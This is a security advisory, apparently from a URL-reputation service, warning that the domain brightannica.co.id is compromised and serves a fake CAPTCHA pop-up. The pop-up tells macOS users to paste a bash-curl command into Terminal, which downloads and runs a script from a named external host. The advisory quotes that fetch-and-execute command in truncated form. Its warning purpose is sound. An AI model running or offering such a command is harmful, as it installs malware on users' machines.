brightannica.co.id

Risk Category: Confirmed Malware Delivery / Social Engineering

URLert.com has classified brightannica.co.id as a high-risk domain. While the site appears to belong to a legitimate education and migration agency, it has been compromised to serve as a delivery vector for sophisticated malware targeting macOS and potentially other operating systems.

The domain is currently hosting a malicious "Verification" overlay designed to trick users into compromising their own systems through a fake CAPTCHA mechanism.

Specific Findings & Evidence:

• Social Engineering Attack: The website displays a fraudulent "Verification Steps" pop-up. It instructs users to open their system Terminal, paste a command (Command + V), and press Enter to "prove they are not a robot."
• Malicious Payload: Admin observations confirm that the clipboard content contains a lethal one-liner command: /bin/bash -c "$(curl -fsSL ...)". This command downloads and executes a remote script from an external, untrusted domain (chernichco5t.digital).
• System Compromise: This technique bypasses browser security sandboxes by convincing the user to execute code directly on their operating system. This typically results in the installation of info-stealers, backdoors, or ransomware.
• Compromised Infrastructure: It is highly likely that the legitimate Brightannica corporate site has been injected with malicious scripts by a third party.

IMMEDIATE ACTION REQUIRED: Do not follow any instructions on this website to open your Terminal or Command Prompt. If you have already executed the requested commands, consider your system fully compromised. Disconnect from the internet immediately, back up essential files, and perform a clean OS reinstallation. Avoid entering any passwords or financial information on the affected device.